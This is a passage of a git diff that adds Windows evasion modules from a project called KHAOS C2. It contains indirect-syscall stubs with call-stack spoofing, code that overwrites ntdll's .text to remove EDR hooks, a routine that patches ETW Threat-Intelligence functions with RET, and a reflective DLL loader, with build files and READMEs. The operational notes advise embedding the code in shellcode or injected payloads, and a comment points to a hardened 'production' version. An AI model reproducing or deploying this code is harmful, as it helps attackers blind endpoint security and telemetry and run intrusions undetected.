sec->VirtualAddress; + SIZE_T sz = sec->Misc.VirtualSize; + for (SIZE_T j = min_off; j + (SIZE_T)seqlen <= sz; j++) { + int ok = 1; + for (int k = 0; k < seqlen; k++) + if (base[j + k] != seq[k]) { ok = 0; break; } + if (ok) return base + j; + } + } + return NULL; +} + +int sc_init(void) +{ + HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + HMODULE kbase = GetModuleHandleA("KernelBase.dll"); + if (!ntdll) return -1; + + /* syscall;ret = 0F 05 C3 */ + static const BYTE gadget_seq[] = { 0x0F, 0x05, 0xC3 }; + sc_gadget = _find_seq(ntdll, gadget_seq, 3, 0); + if (!sc_gadget) return -1; + + /* ret gadgets for call-stack spoofing — skip first few KB to stay in body code */ + static const BYTE ret_seq[] = { 0xC3 }; + if (kbase) sc_frame1 = _find_seq(kbase, ret_seq, 1, 0x2000); + sc_frame2 = _find_seq(ntdll, ret_seq, 1, 0x3000); + + /* fallback: both frames in ntdll if KernelBase ret not found */ + if (!sc_frame1) sc_frame1 = sc_frame2; + if (!sc_frame2) return -1; + + return 0; +} + +uint16_t sc_ssn(const char *name) +{ + HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + if (!ntdll) return 0xFFFF; + + BYTE *fn = (BYTE *)(void *)GetProcAddress(ntdll, name); + if (!fn) return 0xFFFF; + + /* Hell's Gate: stub is clean — read SSN from mov eax, */ + if (fn[0] == 0x4C && fn[1] == 0x8B && fn[2] == 0xD1 && fn[3] == 0xB8) + return *(uint16_t *)(fn + 4); + + /* Halo's Gate: stub is hooked — scan EAT for an unhooked neighbor */ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)ntdll; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)ntdll + dos->e_lfanew); + IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *) + ((BYTE *)ntdll + nt->OptionalHeader.DataDirectory[0].VirtualAddress); + + DWORD *names = (DWORD *)((BYTE *)ntdll + exp->AddressOfNames); + DWORD *funcs = (DWORD *)((BYTE *)ntdll + exp->AddressOfFunctions); + WORD *ords = (WORD *)((BYTE *)ntdll + exp->AddressOfNameOrdinals); + + int idx = -1; + for (DWORD i = 0; i < exp->NumberOfNames; i++) { + if (strcmp((char *)((BYTE *)ntdll + names[i]), name) == 0) { + idx = (int)i; + break; + } + } + if (idx < 0) return 0xFFFF; + + /* scan up to 32 neighbors in both directions */ + for (int d = 1; d <= 32; d++) { + for (int s = -1; s <= 1; s += 2) { + int ni = idx + s * d; + if (ni < 0 || ni >= (int)exp->NumberOfNames) continue; + BYTE *nb = (BYTE *)ntdll + funcs[ords[ni]]; + if (nb[0] == 0x4C && nb[1] == 0x8B && nb[2] == 0xD1 && nb[3] == 0xB8) + return (uint16_t)(*(uint16_t *)(nb + 4) - (uint16_t)(s * d)); + } + } + return 0xFFFF; +} diff --git a/techniques/indirect-syscalls/src/spoof_stub.S b/techniques/indirect-syscalls/src/spoof_stub.S new file mode 100644 index 0000000..d160fa0 --- /dev/null +++ b/techniques/indirect-syscalls/src/spoof_stub.S @@ -0,0 +1,69 @@ +/* + * sc_call(ssn, a1..a11) — indirect syscall with 2-frame call-stack spoofing. + * + * On entry (Windows x64 ABI): + * rcx = ssn (uint16_t syscall number) + * rdx = a1 (1st Nt* arg) + * r8 = a2 + * r9 = a3 + * [rsp+0x28] = a4 + * [rsp+0x30] = a5 + * [rsp+0x38] = a6 + * [rsp+0x40] = a7 + * [rsp+0x48] = a8 + * [rsp+0x50] = a9 + * [rsp+0x58] = a10 + * [rsp+0x60] = a11 + * + * Stack layout after jmp (what the kernel / ETW stack walk sees): + * [rsp+0x00] = sc_frame1 (ret in KernelBase .text — inner spoof frame) + * [rsp+0x08] = sc_frame2 (ret in ntdll .text — outer spoof frame) + * [rsp+0x10] = original return address back to our code + * + * Nt* ABI remapping performed: + * rax = SSN, r10 = a1, rdx = a2, r8 = a3, r9 = a4 + * [rsp+0x28..0x58] = a5..a11 + */ + + .text + .extern sc_gadget + .extern sc_frame1 + .extern sc_frame2 + + .global sc_call +sc_call: + /* Pre-save a5/a6 before touching the stack — their positions shift after subq */ + movq 0x30(%rsp), %r10 + movq 0x38(%rsp), %r11 + + /* Grow stack by 16 bytes: make room for 2 fake return addresses */ + subq $0x10, %rsp + + /* Write spoof frames at the new top of stack */ + movq sc_frame2(%rip), %rax + movq %rax, 0x08(%rsp) /* outer frame: ntdll ret gadget */ + movq sc_frame1(%rip), %rax + movq %rax, 0x00(%rsp) /* inner frame: KernelBase ret gadget */ + + /* Store a5/a6 at their final positions ([rsp+0x28], [rsp+0x30]) */ + movq %r10, 0x28(%rsp) + movq %r11, 0x30(%rsp) + + /* Remap args to Nt* ABI: r10=a1, rdx=a2, r8=a3, r9=a4 */ + movq %rdx, %r10 + movq %r8, %rdx + movq %r9, %r8 + movq 0x38(%rsp), %r9 + + /* Shift a7..a11 down by 0x10 into their final stack positions */ + movq 0x50(%rsp), %r11 ; movq %r11, 0x38(%rsp) + movq 0x58(%rsp), %r11 ; movq %r11, 0x40(%rsp) + movq 0x60(%rsp), %r11 ; movq %r11, 0x48(%rsp) + movq 0x68(%rsp), %r11 ; movq %r11, 0x50(%rsp) + movq 0x70(%rsp), %r11 ; movq %r11, 0x58(%rsp) + + /* Load SSN into eax (lower 16 bits of rcx) */ + movzwl %cx, %eax + + /* Indirect jump: execute syscall;ret inside ntdll — not our code */ + jmpq *sc_gadget(%rip) diff --git a/techniques/ntdll-unhook/Makefile b/techniques/ntdll-unhook/Makefile new file mode 100644 index 0000000..5ac9bcc --- /dev/null +++ b/techniques/ntdll-unhook/Makefile @@ -0,0 +1,27 @@ +CC = x86_64-w64-mingw32-gcc +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector +LDFLAGS = -lntdll + +SRC = src/ntdll_unhook.c src/demo.c +OBJ = $(patsubst src/%.c, build/%.o, $(SRC)) +TARGET = build/demo.exe + +all: build $(TARGET) + +build: + mkdir -p build + +build/%.o: src/%.c + $(CC) $(CFLAGS) -c $< -o $@ + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(OBJ) -o $@ $(LDFLAGS) + +clean: + rm -rf build + +.PHONY: all clean diff --git a/techniques/ntdll-unhook/README.md b/techniques/ntdll-unhook/README.md new file mode 100644 index 0000000..e423dbe --- /dev/null +++ b/techniques/ntdll-unhook/README.md @@ -0,0 +1,112 @@ +# ntdll-unhook + +Restore ntdll.dll `.text` from a fresh disk mapping to remove EDR inline hooks. Also patches `EtwTi*` telemetry functions with a single `RET`. + +Extracted from [KHAOS C2](https://github.com/28Zaaky/khaos-c2). + +--- + +## How it works + +EDR products hook ntdll syscall stubs by overwriting the first bytes with a `JMP` to their trampoline: + +``` +NtOpenProcess (hooked): + E9 xx xx xx xx JMP + ... + +NtOpenProcess (clean): + 4C 8B D1 mov r10, rcx + B8 26 00 00 00 mov eax, 0x26 ; SSN + 0F 05 syscall + C3 ret +``` + +### ntdll_unhook() + +``` +CreateFileW(SystemDir\ntdll.dll, GENERIC_READ) + | + v +CreateFileMappingW(PAGE_READONLY | SEC_IMAGE) <- kernel maps + validates PE + | + v +MapViewOfFile(FILE_MAP_READ) <- clean image, no hooks + | + v +walk .text section in disk image + | + v +NtProtectVirtualMemory(live .text, PAGE_EXECUTE_READWRITE) +memcpy(live .text, disk .text, VirtualSize) +NtProtectVirtualMemory(live .text, original perms) +``` + +Key: `SEC_IMAGE` tells the kernel to map the file as a PE image (applying relocations, verifying signature). The result is a clean in-memory copy of ntdll identical to what the Windows loader would produce — before any userland hooks are applied. + +`NtProtectVirtualMemory` is used instead of `VirtualProtect` because `VirtualProtect` itself goes through ntdll and may be hooked. + +### ntdll_patch_etw_ti() + +Patches three functions in ntdll that feed the kernel ETW-TI (Threat Intelligence) provider: + +| Function | Event | +|---|---| +| `EtwTiLogOpenProcess` | fires on `NtOpenProcess` | +| `EtwTiLogReadWriteVm` | fires on `NtReadVirtualMemory` / `NtWriteVirtualMemory` | +| `EtwTiLogDuplicateHandle` | fires on `NtDuplicateObject` | + +Each is overwritten with `0xC3` (RET). These functions are in ntdll's `.text` section and do not require kernel interaction to patch. + +--- + +## API + +```c +int ntdll_unhook(void); // restore .text — returns 0 on success, -1 on failure +int ntdll_patch_etw_ti(void); // patch 3 EtwTi functions — returns count patched (0-3) +``` + +--- + +## Build + +```bash +make +build/demo.exe +``` + +Expected output on an unhooked system: + +``` +[*] NtOpenProcess bytes before unhook: +[before] 4C 8B D1 B8 26 00 00 00 +[*] ntdll_unhook() = 0 (OK) +[*] NtOpenProcess bytes after unhook: +[after ] 4C 8B D1 B8 26 00 00 00 +[+] stub is clean +[*] ntdll_patch_etw_ti() patched 3/3 functions +``` + +On an EDR-hooked system, `before` will show `E9 ...` (JMP trampoline) and `after` will show the clean syscall stub. + +--- + +## Limitations + +- Restores `.text` only — hooks in other sections (`.data`, import table patching) are not removed. +- Does not re-register exception tables (`.pdata`) for the restored `.text`. If the EDR modified anything related to unwind data, this won't fix it. +- `EtwTi*` patch survives ntdll reload but not process restart. +- Some EDR products monitor `NtMapViewOfSection` for `SEC_IMAGE` mappings of system DLLs. Consider calling `ntdll_unhook` as early as possible (before EDR's DLL loads). + +--- + +## Operational notes + +Call order matters: unhook ntdll **before** patching ETW-TI, so `NtProtectVirtualMemory` calls in `ntdll_patch_etw_ti` go through a clean syscall stub. + +For cross-process injection, unhook in the **target process** context by embedding this code in your shellcode or reflective DLL payload — not from the injector. + +--- + +*Part of [KHAOS C2](https://github.com/28Zaaky/khaos-c2) — by [28Zaaky](https://github.com/28Zaaky)* diff --git a/techniques/ntdll-unhook/build/demo.exe b/techniques/ntdll-unhook/build/demo.exe new file mode 100644 index 0000000..cb4af10 Binary files /dev/null and b/techniques/ntdll-unhook/build/demo.exe differ diff --git a/techniques/ntdll-unhook/include/ntdll_unhook.h b/techniques/ntdll-unhook/include/ntdll_unhook.h new file mode 100644 index 0000000..8f44836 --- /dev/null +++ b/techniques/ntdll-unhook/include/ntdll_unhook.h @@ -0,0 +1,23 @@ +#pragma once +#include + +/* + * ntdll_unhook() + * + * Restores the live ntdll.dll .text section from a fresh copy mapped + * directly from disk using SEC_IMAGE (bypasses filesystem hooks). + * Overwrites any userland inline hooks (e.g. EDR trampolines) with + * clean bytes from the on-disk image. + * + * Returns 0 on success, -1 on failure. + * + * ntdll_patch_etw_ti() + * + * Patches EtwTiLogOpenProcess, EtwTiLogReadWriteVm, EtwTiLogDuplicateHandle + * with a single RET byte via NtProtectVirtualMemory, silencing ETW-TI + * telemetry for process open / memory read-write / handle dup events. + * + * Returns number of functions patched (0-3). + */ +int ntdll_unhook(void); +int ntdll_patch_etw_ti(void); diff --git a/techniques/ntdll-unhook/src/demo.c b/techniques/ntdll-unhook/src/demo.c new file mode 100644 index 0000000..d465e11 --- /dev/null +++ b/techniques/ntdll-unhook/src/demo.c @@ -0,0 +1,50 @@ +#include "ntdll_unhook.h" +#include +#include + +/* + * Demo: read the first 6 bytes of NtOpenProcess before and after unhooking. + * + * A hooked stub looks like: + * E9 xx xx xx xx xx JMP + * + * A clean stub looks like: + * 4C 8B D1 mov r10, rcx + * B8 xx 00 00 00 mov eax, + * 0F 05 syscall + * C3 ret + */ +static void print_bytes(const char *label, const BYTE *p, int n) +{ + printf("[%s] ", label); + for (int i = 0; i < n; i++) printf("%02X ", p[i]); + printf("\n"); +} + +int main(void) +{ + HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + BYTE *fn = (BYTE *)(void *)GetProcAddress(ntdll, "NtOpenProcess"); + + printf("[*] NtOpenProcess bytes before unhook:\n"); + print_bytes("before", fn, 8); + + int rc = ntdll_unhook(); + printf("[*] ntdll_unhook() = %d (%s)\n", rc, rc == 0 ? "OK" : "FAIL"); + + printf("[*] NtOpenProcess bytes after unhook:\n"); + print_bytes("after ", fn, 8); + + /* Expected clean pattern: 4C 8B D1 B8 00 00 */ + int clean = (fn[0] == 0x4C && fn[1] == 0x8B && fn[2] == 0xD1 && fn[3] == 0xB8); + printf("[%s] stub is %s\n", clean ? "+" : "!", clean ? "clean" : "still hooked or unknown"); + + /* ETW-TI patch — only present on specific Windows builds (PPL/ETW-TI enabled) */ + int n = ntdll_patch_etw_ti(); + if (n > 0) + printf("[+] ntdll_patch_etw_ti() patched %d/3 functions\n", n); + else + printf("[*] ntdll_patch_etw_ti(): EtwTi* exports not present on this build (normal on consumer SKUs)\n"); + + return clean ? 0 : 1; +} diff --git a/techniques/ntdll-unhook/src/ntdll_unhook.c b/techniques/ntdll-unhook/src/ntdll_unhook.c new file mode 100644 index 0000000..a9ebefc --- /dev/null +++ b/techniques/ntdll-unhook/src/ntdll_unhook.c @@ -0,0 +1,124 @@ +#include "ntdll_unhook.h" +#include +#include +#include + +/* + * PoC note: uses GetModuleHandleA/GetProcAddress with plaintext strings. + * In production, replace with a PEB walk and encrypted string storage. + * See agent/src/evasion/evasion.c in KHAOS C2 for the hardened version. + */ + +/* NtProtectVirtualMemory — used instead of VirtualProtect to avoid + * hooking the hook-removal function itself. */ +typedef NTSTATUS (NTAPI *NtPVM_t)(HANDLE, PVOID *, PSIZE_T, ULONG, PULONG); + +static NtPVM_t _get_ntpvm(void) +{ + static NtPVM_t fn = NULL; + if (!fn) + fn = (NtPVM_t)(void *)GetProcAddress( + GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory"); + return fn; +} + +static BOOL _nt_prot(LPVOID addr, SIZE_T sz, DWORD prot, DWORD *old) +{ + NtPVM_t fn = _get_ntpvm(); + if (!fn) return FALSE; + PVOID base = addr; + SIZE_T rsz = sz; + ULONG _old = 0; + NTSTATUS st = fn((HANDLE)(LONG_PTR)-1, &base, &rsz, (ULONG)prot, &_old); + if (old) *old = (DWORD)_old; + return st == 0; +} + +int ntdll_unhook(void) +{ + /* Build ntdll.dll path: GetSystemDirectoryW + \ntdll.dll */ + WCHAR path[MAX_PATH]; + UINT dir_len = GetSystemDirectoryW(path, MAX_PATH); + if (!dir_len || dir_len > MAX_PATH - 12) return -1; + + const WCHAR suffix[] = { + L'\\',L'n',L't',L'd',L'l',L'l',L'.',L'd',L'l',L'l',L'\0' + }; + for (int i = 0; suffix[i]; i++) path[dir_len + i] = suffix[i]; + path[dir_len + 10] = L'\0'; + + /* Map ntdll from disk via SEC_IMAGE — kernel validates the PE, + * bypasses any filesystem filter hooks, gives us a clean image. */ + HANDLE hFile = CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, + NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) return -1; + + HANDLE hMap = CreateFileMappingW(hFile, NULL, + PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); + CloseHandle(hFile); + if (!hMap) return -1; + + LPVOID disk = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0); + CloseHandle(hMap); + if (!disk) return -1; + + int rc = -1; + + /* Get live ntdll base */ + HMODULE live = GetModuleHandleA("ntdll.dll"); + if (!live) goto cleanup; + + /* Walk PE sections to find .text */ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)disk; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) goto cleanup; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)disk + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) goto cleanup; + + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) { + if (memcmp(sec->Name, ".text", 5) != 0) continue; + + LPVOID live_text = (BYTE *)live + sec->VirtualAddress; + LPVOID disk_text = (BYTE *)disk + sec->VirtualAddress; + SIZE_T text_sz = sec->Misc.VirtualSize; + + DWORD old; + if (!_nt_prot(live_text, text_sz, PAGE_EXECUTE_READWRITE, &old)) + break; + memcpy(live_text, disk_text, text_sz); + _nt_prot(live_text, text_sz, old, &old); + rc = 0; + break; + } + +cleanup: + UnmapViewOfFile(disk); + return rc; +} + +int ntdll_patch_etw_ti(void) +{ + HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + if (!ntdll) return 0; + + /* ETW-TI functions that report process/memory/handle activity to the + * kernel ETW provider — patching them suppresses cross-process telemetry. */ + static const char *targets[] = { + "EtwTiLogOpenProcess", + "EtwTiLogReadWriteVm", + "EtwTiLogDuplicateHandle", + }; + + int patched = 0; + for (int i = 0; i < 3; i++) { + BYTE *fn = (BYTE *)(void *)GetProcAddress(ntdll, targets[i]); + if (!fn) continue; + + DWORD old; + if (!_nt_prot(fn, 1, PAGE_EXECUTE_READWRITE, &old)) continue; + *fn = 0xC3; /* RET */ + _nt_prot(fn, 1, old, &old); + patched++; + } + return patched; +} diff --git a/techniques/reflect-dll/.gitignore b/techniques/reflect-dll/.gitignore new file mode 100644 index 0000000..79b039d --- /dev/null +++ b/techniques/reflect-dll/.gitignore @@ -0,0 +1,3 @@ +build/ +*.o +*.a diff --git a/techniques/reflect-dll/Makefile b/techniques/reflect-dll/Makefile new file mode 100644 index 0000000..f116bbc --- /dev/null +++ b/techniques/reflect-dll/Makefile @@ -0,0 +1,28 @@ +CC = x86_64-w64-mingw32-gcc +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector +LDFLAGS = -Wl,--file-alignment,0x1000 + +DLL_SRC = src/reflect.c src/example_dll.c +EXE_SRC = examples/loader.c +DLL_OUT = build/example.dll +EXE_OUT = build/loader.exe + +all: build $(DLL_OUT) $(EXE_OUT) + +build: + mkdir -p build + +$(DLL_OUT): $(DLL_SRC) + $(CC) $(CFLAGS) $(LDFLAGS) -shared -o $@ $^ + +$(EXE_OUT): $(EXE_SRC) + $(CC) $(CFLAGS) -o $@ $^ + +clean: + rm -rf build + +.PHONY: all clean diff --git a/techniques/reflect-dll/README.md b/techniques/reflect-dll/README.md new file mode 100644 index 0000000..78447ae --- /dev/null +++ b/techniques/reflect-dll/README.md @@ -0,0 +1,43 @@ +# ShdwLdr + +Reflective DLL loader for Windows x64. Maps a raw DLL from memory without the Windows loader. + +By 28Zaaky — [KHAOS C2](https://github.com/28Zaaky/khaos-c2) + +## Techniques + +- Hash-based API resolution (ROR13, no plaintext strings) +- Hell's Gate + Halos Gate + Tartarus Gate (direct syscalls, hooked stub recovery) +- Per-section permissions via `NtProtectVirtualMemory` syscall +- TLS callbacks + slot allocation before `DllMain` +- `RtlAddFunctionTable` for x64 SEH +- AMSI + ETW bypass +- Header erasure, security cookie init + +## Build + +```bash +x86_64-w64-mingw32-gcc -O2 -Iinclude -fno-asynchronous-unwind-tables \ + -fno-ident -fno-stack-protector -Wl,--file-alignment,0x1000 \ + -shared -o build/example.dll src/reflect.c src/example_dll.c + +x86_64-w64-mingw32-gcc -O2 -Iinclude -fno-asynchronous-unwind-tables \ + -fno-ident -fno-stack-protector -o build/loader.exe examples/loader.c +``` + +> `--file-alignment,0x1000` : `PointerToRawData == VirtualAddress` — required for RIP-relative access while running from the raw buffer. + +## Usage + +```c +uint8_t *mem = VirtualAlloc(NULL, sz, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); +memcpy(mem, raw_dll, sz); +typedef ULONG_PTR (WINAPI *RL_t)(LPVOID); +ULONG_PTR base = ((RL_t)find_export(mem, "ReflectiveLoader"))(mem); +``` + +## Notes + +- x64 only. No module list entry added. +- Module stomping disabled — `LoadLibraryExA(DONT_RESOLVE_DLL_REFERENCES)` calls `DllMain` on Win10+. Needs `NtMapViewOfSection`. +- `_rl_dbg` export contains runtime telemetry (SSNs, alloc method) — strip for production. diff --git a/techniques/reflect-dll/build/debug_loader.exe b/techniques/reflect-dll/build/debug_loader.exe new file mode 100644 index 0000000..6fc8808 Binary files /dev/null and b/techniques/reflect-dll/build/debug_loader.exe differ diff --git a/techniques/reflect-dll/build/example.dll b/techniques/reflect-dll/build/example.dll new file mode 100644 index 0000000..d97b439 Binary files /dev/null and b/techniques/reflect-dll/build/example.dll differ diff --git a/techniques/reflect-dll/build/example.enc b/techniques/reflect-dll/build/example.enc new file mode 100644 index 0000000..e69de29 diff --git a/techniques/reflect-dll/build/example_dbg.dll b/techniques/reflect-dll/build/example_dbg.dll new file mode 100644 index 0000000..7bb073d Binary files /dev/null and b/techniques/reflect-dll/build/example_dbg.dll differ diff --git a/techniques/reflect-dll/build/loader.exe b/techniques/reflect-dll/build/loader.exe new file mode 100644 index 0000000..b53e317 Binary files /dev/null and b/techniques/reflect-dll/build/loader.exe differ diff --git a/techniques/reflect-dll/examples/loader.c b/techniques/reflect-dll/examples/loader.c new file mode 100644 index 0000000..2faf7f3 --- /dev/null +++ b/techniques/reflect-dll/examples/loader.c @@ -0,0 +1,225 @@ +// Example loader for the reflective DLL. +// It reads the raw DLL from disk, copies it into RWX memory, +// finds ReflectiveLoader in the raw image, and calls it. + +#include +#include +#include +#include + +// convert a raw RVA to a raw file offset +static DWORD rva_to_off(const uint8_t *buf, const IMAGE_NT_HEADERS *nt, DWORD rva) +{ + const IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + WORD nsec = nt->FileHeader.NumberOfSections; + for (WORD i = 0; i < nsec; i++) + { + if (rva >= sec[i].VirtualAddress && + rva < sec[i].VirtualAddress + sec[i].SizeOfRawData) + return rva - sec[i].VirtualAddress + sec[i].PointerToRawData; + } + return 0; + (void)buf; +} + +// find an export in the raw DLL buffer and return the function address in memory +static LPVOID find_export_in_raw(const uint8_t *buf, size_t bufsz, + const uint8_t *mem, const char *name) +{ + if (bufsz < sizeof(IMAGE_DOS_HEADER)) + return NULL; + const IMAGE_DOS_HEADER *dos = (const IMAGE_DOS_HEADER *)buf; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) + return NULL; + + const IMAGE_NT_HEADERS *nt = (const IMAGE_NT_HEADERS *)(buf + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) + return NULL; + + DWORD expRva = nt->OptionalHeader + .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] + .VirtualAddress; + if (!expRva) + return NULL; + + DWORD expOff = rva_to_off(buf, nt, expRva); + if (!expOff) + return NULL; + + const IMAGE_EXPORT_DIRECTORY *exp = (const IMAGE_EXPORT_DIRECTORY *)(buf + expOff); + + DWORD namesOff = rva_to_off(buf, nt, exp->AddressOfNames); + DWORD ordsOff = rva_to_off(buf, nt, exp->AddressOfNameOrdinals); + DWORD funcsOff = rva_to_off(buf, nt, exp->AddressOfFunctions); + if (!namesOff || !ordsOff || !funcsOff) + return NULL; + + DWORD *names = (DWORD *)(buf + namesOff); + WORD *ords = (WORD *)(buf + ordsOff); + DWORD *funcs = (DWORD *)(buf + funcsOff); + + for (DWORD i = 0; i < exp->NumberOfNames; i++) + { + DWORD nameOff = rva_to_off(buf, nt, names[i]); + if (!nameOff) + continue; + const char *n = (const char *)(buf + nameOff); + if (strcmp(n, name) == 0) + { + DWORD fnRva = funcs[ords[i]]; + DWORD fnOff = rva_to_off(buf, nt, fnRva); + return fnOff ? (LPVOID)(mem + fnOff) : NULL; + } + } + return NULL; +} + +// read the raw DLL file into memory +static uint8_t *read_file(const char *path, size_t *out_size) +{ + HANDLE hf = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, + NULL, OPEN_EXISTING, 0, NULL); + if (hf == INVALID_HANDLE_VALUE) + return NULL; + + DWORD sz = GetFileSize(hf, NULL); + if (sz == INVALID_FILE_SIZE || sz == 0) + { + CloseHandle(hf); + return NULL; + } + + uint8_t *b = (uint8_t *)HeapAlloc(GetProcessHeap(), 0, sz); + if (!b) + { + CloseHandle(hf); + return NULL; + } + + DWORD rd; + if (!ReadFile(hf, b, sz, &rd, NULL) || rd != sz) + { + HeapFree(GetProcessHeap(), 0, b); + CloseHandle(hf); + return NULL; + } + CloseHandle(hf); + *out_size = sz; + return b; +} + +int main(int argc, char **argv) +{ + char dll_path[MAX_PATH]; + + if (argc > 1) + { + strncpy(dll_path, argv[1], MAX_PATH - 1); + dll_path[MAX_PATH - 1] = '\0'; + } + else + { + char exe_path[MAX_PATH]; + DWORD len = GetModuleFileNameA(NULL, exe_path, MAX_PATH); + if (len == 0 || len >= MAX_PATH) + return 1; + + // build default path in the same directory as loader.exe + char *sep = strrchr(exe_path, '\\'); + if (sep) + *(sep + 1) = '\0'; + else + exe_path[0] = '\0'; + + snprintf(dll_path, MAX_PATH, "%sexample.dll", exe_path); + } + + printf("[*] reading %s\n", dll_path); + size_t sz = 0; + uint8_t *buf = read_file(dll_path, &sz); + if (!buf) + { + fprintf(stderr, "[!] read failed (error %lu)\n", GetLastError()); + return 1; + } + printf("[+] %zu bytes read\n", sz); + + // allocate RWX memory for the raw DLL image + uint8_t *mem = (uint8_t *)VirtualAlloc(NULL, sz, + MEM_RESERVE | MEM_COMMIT, + PAGE_EXECUTE_READWRITE); + if (!mem) + { + fprintf(stderr, "[!] VirtualAlloc failed (%lu)\n", GetLastError()); + HeapFree(GetProcessHeap(), 0, buf); + return 1; + } + memcpy(mem, buf, sz); + printf("[+] raw DLL at %p (RWX, %zu bytes)\n", (void *)mem, sz); + + // locate ReflectiveLoader in the raw image and call it + typedef ULONG_PTR(WINAPI *RL_t)(LPVOID); + RL_t fn = (RL_t)find_export_in_raw(buf, sz, mem, "ReflectiveLoader"); + HeapFree(GetProcessHeap(), 0, buf); + + if (!fn) + { + fprintf(stderr, "[!] ReflectiveLoader export not found\n"); + VirtualFree(mem, 0, MEM_RELEASE); + return 1; + } + printf("[+] ReflectiveLoader at %p\n", (void *)fn); + + printf("[*] calling ReflectiveLoader...\n"); + ULONG_PTR base = fn(mem); + if (!base) + { + fprintf(stderr, "[!] ReflectiveLoader returned 0\n"); + VirtualFree(mem, 0, MEM_RELEASE); + return 1; + } + printf("[+] DLL mapped at 0x%llx\n", (unsigned long long)base); + + // read debug telemetry written into mem[] by ReflectiveLoader before section copy + typedef struct { uint16_t ssn_alloc; uint16_t ssn_protect; uint32_t alloc_method; } RL_DBG; + RL_DBG *dbg = (RL_DBG *)find_export_in_raw(mem, sz, mem, "_rl_dbg"); + if (dbg) + { + const char *method = dbg->alloc_method == 1 ? "Hell's Gate (NtAllocateVirtualMemory syscall)" + : dbg->alloc_method == 2 ? "VirtualAlloc (fallback)" + : "unknown"; + printf("[*] alloc method : %s\n", method); + if (dbg->ssn_alloc != 0xFFFF) + printf("[*] ssn NtAllocateVirtualMemory : 0x%04x\n", dbg->ssn_alloc); + else + printf("[*] ssn NtAllocateVirtualMemory : not found (ntdll hooked?)\n"); + if (dbg->ssn_protect != 0xFFFF) + printf("[*] ssn NtProtectVirtualMemory : 0x%04x\n", dbg->ssn_protect); + else + printf("[*] ssn NtProtectVirtualMemory : not found (ntdll hooked?)\n"); + } + + // check if the marker file was created + char marker[MAX_PATH]; + DWORD n = GetEnvironmentVariableA("TEMP", marker, MAX_PATH - 20); + if (n && n < MAX_PATH - 20) + { + // DllMain marker + const char *s = "\\reflect_demo.txt"; + int i = 0; + for (i = 0; s[i]; i++) marker[n + i] = s[i]; + marker[n + i] = '\0'; + printf("[%c] DllMain marker : %s\n", + GetFileAttributesA(marker) != INVALID_FILE_ATTRIBUTES ? '+' : '!', marker); + + // TLS callback marker + s = "\\reflect_tls.txt"; + for (i = 0; s[i]; i++) marker[n + i] = s[i]; + marker[n + i] = '\0'; + printf("[%c] TLS callback : %s\n", + GetFileAttributesA(marker) != INVALID_FILE_ATTRIBUTES ? '+' : '!', marker); + } + + VirtualFree(mem, 0, MEM_RELEASE); + return 0; +} \ No newline at end of file diff --git a/techniques/reflect-dll/include/reflect.h b/techniques/reflect-dll/include/reflect.h new file mode 100644 index 0000000..d71f732 --- /dev/null +++ b/techniques/reflect-dll/include/reflect.h @@ -0,0 +1,6 @@ +#pragma once +#include + +// Exported entry point for the reflective DLL. +// lpParameter is the raw image base in the target process. +ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter); diff --git a/techniques/reflect-dll/src/debug_loader.c b/techniques/reflect-dll/src/debug_loader.c new file mode 100644 index 0000000..6ce69d7 --- /dev/null +++ b/techniques/reflect-dll/src/debug_loader.c @@ -0,0 +1,283 @@ +// debug_loader.c: a verbose step-by-step version of ReflectiveLoader. +// This program runs with normal IAT resolution and prints each stage. + +#include +#include +#include +#include +#include + +// case-insensitive compare for ascii strings +static int _eq(const char *a, const char *b) +{ + while (*a && *b && (*a | 0x20) == (*b | 0x20)) + { + a++; + b++; + } + return !*a && !*b; +} + +// compare wide string and ascii string for n characters +static int _weq(const WCHAR *w, const char *s, int n) +{ + for (int i = 0; i < n; i++) + { + if (!w[i] && !s[i]) + return 1; + if (!w[i] || !s[i]) + return 0; + if ((w[i] | 0x20) != ((unsigned char)s[i] | 0x20)) + return 0; + } + return 1; +} + +static uint8_t *buf = NULL; +static size_t bufsz = 0; + +// convert a raw RVA into a file offset inside the raw buffer +static DWORD rva2off(DWORD rva) +{ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)buf; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(buf + dos->e_lfanew); + IMAGE_SECTION_HEADER *s = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, s++) + { + if (rva >= s->VirtualAddress && rva < s->VirtualAddress + s->SizeOfRawData) + return rva - s->VirtualAddress + s->PointerToRawData; + } + return 0; +} + +// read an entire file into memory +static uint8_t *read_file(const char *path, size_t *out) +{ + HANDLE h = CreateFileA(path, GENERIC_READ, 